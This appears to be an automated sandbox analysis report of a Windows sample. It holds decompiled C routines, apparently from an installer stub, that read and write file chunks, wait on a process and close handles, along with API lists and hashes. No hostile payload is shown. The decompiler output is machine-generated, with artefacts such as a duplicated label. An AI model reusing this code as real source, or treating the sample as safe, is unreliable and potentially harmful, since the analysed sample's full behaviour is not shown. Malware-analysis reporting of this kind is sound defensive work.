                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                                                                                                                                                                              • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                              			E0040329A(intOrPtr _a4) {
                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t34 =  *0x41f8fc -  *0x40b868 + _a4;
                                                                                                                                                                                                              				 *0x424750 = GetTickCount() + 0x1f4;
                                                                                                                                                                                                              				if(_t34 <= 0) {
                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                              					E00402E52(1);
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E00403419( *0x41f90c);
                                                                                                                                                                                                              				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
                                                                                                                                                                                                              				 *0x41f908 = _t34;
                                                                                                                                                                                                              				 *0x41f8f8 = 0;
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					_t31 = 0x4000;
                                                                                                                                                                                                              					_t11 =  *0x41f900 -  *0x41f90c;
                                                                                                                                                                                                              					if(_t11 <= 0x4000) {
                                                                                                                                                                                                              						_t31 = _t11;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t12 = E00403403(0x4138f8, _t31);
                                                                                                                                                                                                              					if(_t12 == 0) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *0x41f90c =  *0x41f90c + _t31;
                                                                                                                                                                                                              					 *0x40b888 = 0x4138f8;
                                                                                                                                                                                                              					 *0x40b88c = _t31;
                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                              					if( *0x424754 != 0 &&  *0x424800 == 0) {
                                                                                                                                                                                                              						 *0x41f8f8 =  *0x41f908 -  *0x41f8fc - _a4 +  *0x40b868;
                                                                                                                                                                                                              						E00402E52(0);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *0x40b890 = 0x40b8f8;
                                                                                                                                                                                                              					 *0x40b894 = 0x8000; // executed
                                                                                                                                                                                                              					_t14 = E00406776(0x40b870); // executed
                                                                                                                                                                                                              					if(_t14 < 0) {
                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t36 =  *0x40b890; // 0x40c844
                                                                                                                                                                                                              					_t37 = _t36 - 0x40b8f8;
                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                              						__eflags =  *0x40b88c; // 0x0
                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _t31;
                                                                                                                                                                                                              						if(_t31 == 0) {
                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                              						_t16 =  *0x41f8fc;
                                                                                                                                                                                                              						if(_t16 -  *0x40b868 + _a4 > 0) {
                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						SetFilePointer( *0x40a01c, _t16, 0, 0);
                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
                                                                                                                                                                                                              					if(_t18 == 0) {
                                                                                                                                                                                                              						_push(0xfffffffe);
                                                                                                                                                                                                              						L21:
                                                                                                                                                                                                              						_pop(_t15);
                                                                                                                                                                                                              						return _t15;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *0x40b868 =  *0x40b868 + _t37;
                                                                                                                                                                                                              					_t49 =  *0x40b88c; // 0x0
                                                                                                                                                                                                              					if(_t49 != 0) {
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                              					_push(0xfffffffd);
                                                                                                                                                                                                              					goto L21;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t12 | 0xffffffff;
                                                                                                                                                                                                              			}














                                                                                                                                                                                                              0x004032aa
                                                                                                                                                                                                              0x004032bd
                                                                                                                                                                                                              0x004032c2
                                                                                                                                                                                                              0x004033f2
                                                                                                                                                                                                              0x004033f4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033fa
                                                                                                                                                                                                              0x004032ce
                                                                                                                                                                                                              0x004032e1
                                                                                                                                                                                                              0x004032e7
                                                                                                                                                                                                              0x004032ed
                                                                                                                                                                                                              0x004032f8
                                                                                                                                                                                                              0x004032fd
                                                                                                                                                                                                              0x00403302
                                                                                                                                                                                                              0x0040330a
                                                                                                                                                                                                              0x0040330c
                                                                                                                                                                                                              0x0040330c
                                                                                                                                                                                                              0x00403315
                                                                                                                                                                                                              0x0040331c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403322
                                                                                                                                                                                                              0x00403328
                                                                                                                                                                                                              0x0040332e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403334
                                                                                                                                                                                                              0x0040333a
                                                                                                                                                                                                              0x0040335a
                                                                                                                                                                                                              0x0040335f
                                                                                                                                                                                                              0x00403364
                                                                                                                                                                                                              0x0040336a
                                                                                                                                                                                                              0x00403370
                                                                                                                                                                                                              0x0040337a
                                                                                                                                                                                                              0x00403381
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403383
                                                                                                                                                                                                              0x00403389
                                                                                                                                                                                                              0x0040338b
                                                                                                                                                                                                              0x004033ae
                                                                                                                                                                                                              0x004033b4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033b6
                                                                                                                                                                                                              0x004033b8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033ba
                                                                                                                                                                                                              0x004033ba
                                                                                                                                                                                                              0x004033cd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033dc
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033dc
                                                                                                                                                                                                              0x00403395
                                                                                                                                                                                                              0x0040339c
                                                                                                                                                                                                              0x004033e9
                                                                                                                                                                                                              0x004033ef
                                                                                                                                                                                                              0x004033ef
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033ef
                                                                                                                                                                                                              0x0040339e
                                                                                                                                                                                                              0x004033a4
                                                                                                                                                                                                              0x004033aa
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033ed
                                                                                                                                                                                                              0x004033ed
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004033ed
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032AE
                                                                                                                                                                                                                • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1092082344-0
                                                                                                                                                                                                              • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                                                                                                                                                                              • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004066A6(void* __ecx, void* _a4) {
                                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                                              				long _t6;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                                                                                                                                              				while(_t6 == 0x102) {
                                                                                                                                                                                                              					E0040666D(0xf);
                                                                                                                                                                                                              					_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				GetExitCodeProcess(_a4,  &_v8); // executed
                                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x004066b7
                                                                                                                                                                                                              0x004066ce
                                                                                                                                                                                                              0x004066c2
                                                                                                                                                                                                              0x004066cc
                                                                                                                                                                                                              0x004066cc
                                                                                                                                                                                                              0x004066d9
                                                                                                                                                                                                              0x004066e5

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 004066B7
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004066CC
                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 004066D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2567322000-0
                                                                                                                                                                                                              • Opcode ID: fed7b83ecc54252f8897308705ae45f822d023a23d6b40135bb103adba4fca30
                                                                                                                                                                                                              • Instruction ID: 20f91f9203a0284d0687456dabf59fbd28b0b8c4ed1a25645ee0343e140546d9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed7b83ecc54252f8897308705ae45f822d023a23d6b40135bb103adba4fca30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ABE0D831610508FBDB009F55DD05E9E7B6EDB44710F110033F601B61A0D7B39E25DBA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00403949() {
                                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t1 =  *0x40a018; // 0xffffffff
                                                                                                                                                                                                              				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                              					CloseHandle(_t1);
                                                                                                                                                                                                              					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t2 =  *0x40a01c; // 0xffffffff
                                                                                                                                                                                                              				if(_t2 != 0xffffffff) {
                                                                                                                                                                                                              					CloseHandle(_t2);
                                                                                                                                                                                                              					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                                                                                                                                              					_t11 =  *0x40a01c;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E004039A6();
                                                                                                                                                                                                              				return E004059F0(_t11, 0x42b800, 7);
                                                                                                                                                                                                              			}






                                                                                                                                                                                                              0x00403949
                                                                                                                                                                                                              0x00403958
                                                                                                                                                                                                              0x0040395b
                                                                                                                                                                                                              0x0040395d
                                                                                                                                                                                                              0x0040395d
                                                                                                                                                                                                              0x00403964
                                                                                                                                                                                                              0x0040396c
                                                                                                                                                                                                              0x0040396f
                                                                                                                                                                                                              0x00403971
                                                                                                                                                                                                              0x00403971
                                                                                                                                                                                                              0x00403971
                                                                                                                                                                                                              0x00403978
                                                                                                                                                                                                              0x0040398a

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF), ref: 0040395B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF), ref: 0040396F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                              • API String ID: 2962429428-4017390910
                                                                                                                                                                                                              • Opcode ID: 3c4dd07ac0d51147ed7a0aaad34b97e8bb6a5692673cd1a0e507344dbb086eee
                                                                                                                                                                                                              • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c4dd07ac0d51147ed7a0aaad34b97e8bb6a5692673cd1a0e507344dbb086eee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                              			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                                              				long _t22;
                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t21 = _a4;
                                                                                                                                                                                                              				if(_t21 >= 0) {
                                                                                                                                                                                                              					_t32 = _t21 +  *0x4247b8;
                                                                                                                                                                                                              					 *0x41f8fc = _t32;
                                                                                                                                                                                                              					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t22 = E0040329A(4);
                                                                                                                                                                                                              				if(_t22 >= 0) {
                                                                                                                                                                                                              					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
                                                                                                                                                                                                              					if(_t24 == 0) {
                                                                                                                                                                                                              						L18:
                                                                                                                                                                                                              						_push(0xfffffffd);
                                                                                                                                                                                                              						goto L19;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *0x41f8fc =  *0x41f8fc + 4;
                                                                                                                                                                                                              						_t36 = E0040329A(_a4);
                                                                                                                                                                                                              						if(_t36 < 0) {
                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                              							_t22 = _t36;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							if(_a12 != 0) {
                                                                                                                                                                                                              								_t26 = _a4;
                                                                                                                                                                                                              								if(_t26 >= _a16) {
                                                                                                                                                                                                              									_t26 = _a16;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                                                                                                              								if(_t27 != 0) {
                                                                                                                                                                                                              									_t36 = _v8;
                                                                                                                                                                                                              									 *0x41f8fc =  *0x41f8fc + _t36;
                                                                                                                                                                                                              									goto L21;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L18;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								if(_a4 <= 0) {
                                                                                                                                                                                                              									goto L21;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										_t28 = _a4;
                                                                                                                                                                                                              										if(_a4 >= 0x4000) {
                                                                                                                                                                                                              											_t28 = 0x4000;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_v8 = _t28;
                                                                                                                                                                                                              										_t29 = E00405E39( *0x40a01c, 0x4138f8, _t28); // executed
                                                                                                                                                                                                              										if(_t29 == 0) {
                                                                                                                                                                                                              											goto L18;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
                                                                                                                                                                                                              										if(_t30 == 0) {
                                                                                                                                                                                                              											_push(0xfffffffe);
                                                                                                                                                                                                              											L19:
                                                                                                                                                                                                              											_pop(_t22);
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_t31 = _v8;
                                                                                                                                                                                                              											_a4 = _a4 - _t31;
                                                                                                                                                                                                              											 *0x41f8fc =  *0x41f8fc + _t31;
                                                                                                                                                                                                              											_t36 = _t36 + _t31;
                                                                                                                                                                                                              											if(_a4 > 0) {
                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L21;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										goto L22;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									goto L18;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L22:
                                                                                                                                                                                                              				return _t22;
                                                                                                                                                                                                              			}















                                                                                                                                                                                                              0x00403196
                                                                                                                                                                                                              0x0040319f
                                                                                                                                                                                                              0x004031a8
                                                                                                                                                                                                              0x004031ac
                                                                                                                                                                                                              0x004031b7
                                                                                                                                                                                                              0x004031b7
                                                                                                                                                                                                              0x004031bf
                                                                                                                                                                                                              0x004031c6
                                                                                                                                                                                                              0x004031d8
                                                                                                                                                                                                              0x004031df
                                                                                                                                                                                                              0x00403284
                                                                                                                                                                                                              0x00403284
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004031e5
                                                                                                                                                                                                              0x004031e8
                                                                                                                                                                                                              0x004031f4
                                                                                                                                                                                                              0x004031f8
                                                                                                                                                                                                              0x00403292
                                                                                                                                                                                                              0x00403292
                                                                                                                                                                                                              0x004031fe
                                                                                                                                                                                                              0x00403201
                                                                                                                                                                                                              0x00403260
                                                                                                                                                                                                              0x00403266
                                                                                                                                                                                                              0x00403268
                                                                                                                                                                                                              0x00403268
                                                                                                                                                                                                              0x0040327a
                                                                                                                                                                                                              0x00403282
                                                                                                                                                                                                              0x00403289
                                                                                                                                                                                                              0x0040328c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403203
                                                                                                                                                                                                              0x00403206
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040320c
                                                                                                                                                                                                              0x00403211
                                                                                                                                                                                                              0x00403218
                                                                                                                                                                                                              0x0040321b
                                                                                                                                                                                                              0x0040321d
                                                                                                                                                                                                              0x0040321d
                                                                                                                                                                                                              0x0040322a
                                                                                                                                                                                                              0x0040322d
                                                                                                                                                                                                              0x00403234
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040323d
                                                                                                                                                                                                              0x00403244
                                                                                                                                                                                                              0x0040325c
                                                                                                                                                                                                              0x00403286
                                                                                                                                                                                                              0x00403286
                                                                                                                                                                                                              0x00403246
                                                                                                                                                                                                              0x00403246
                                                                                                                                                                                                              0x00403249
                                                                                                                                                                                                              0x0040324c
                                                                                                                                                                                                              0x00403252
                                                                                                                                                                                                              0x00403258
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040325a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040325a
                                                                                                                                                                                                              0x00403258
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403244
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403211
                                                                                                                                                                                                              0x00403206
                                                                                                                                                                                                              0x00403201
                                                                                                                                                                                                              0x004031f8
                                                                                                                                                                                                              0x004031df
                                                                                                                                                                                                              0x00403294
                                                                                                                                                                                                              0x00403297

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                                                                                                                                                                              • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                                                              			E00401389(signed int _a4, struct HWND__* _a11) {
                                                                                                                                                                                                              				intOrPtr* _t6;
                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t17 = _a4;
                                                                                                                                                                                                              				while(_t17 >= 0) {
                                                                                                                                                                                                              					_t6 = _t17 * 0x1c +  *0x424790;
                                                                                                                                                                                                              					if( *_t6 == 1) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(_t6); // executed
                                                                                                                                                                                                              					_t8 = E00401434(); // executed
                                                                                                                                                                                                              					if(_t8 == 0x7fffffff) {
                                                                                                                                                                                                              						return 0x7fffffff;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t10 = E0040136D(_t8);
                                                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                                                              						_t11 = _t10 - 1;
                                                                                                                                                                                                              						_t16 = _t17;
                                                                                                                                                                                                              						_t17 = _t11;
                                                                                                                                                                                                              						_t12 = _t11 - _t16;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t12 = _t10 + 1;
                                                                                                                                                                                                              						_t17 = _t17 + 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_a11 != 0) {
                                                                                                                                                                                                              						 *0x423f2c =  *0x423f2c + _t12;
                                                                                                                                                                                                              						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}










                                                                                                                                                                                                              0x0040138a
                                                                                                                                                                                                              0x004013fa
                                                                                                                                                                                                              0x0040139b
                                                                                                                                                                                                              0x004013a0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004013a2
                                                                                                                                                                                                              0x004013a3
                                                                                                                                                                                                              0x004013ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00401404
                                                                                                                                                                                                              0x004013b0
                                                                                                                                                                                                              0x004013b7
                                                                                                                                                                                                              0x004013bd
                                                                                                                                                                                                              0x004013be
                                                                                                                                                                                                              0x004013c0
                                                                                                                                                                                                              0x004013c2
                                                                                                                                                                                                              0x004013b9
                                                                                                                                                                                                              0x004013b9
                                                                                                                                                                                                              0x004013ba
                                                                                                                                                                                                              0x004013ba
                                                                                                                                                                                                              0x004013c9
                                                                                                                                                                                                              0x004013cb
                                                                                                                                                                                                              0x004013f4
                                                                                                                                                                                                              0x004013f4
                                                                                                                                                                                                              0x004013c9
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
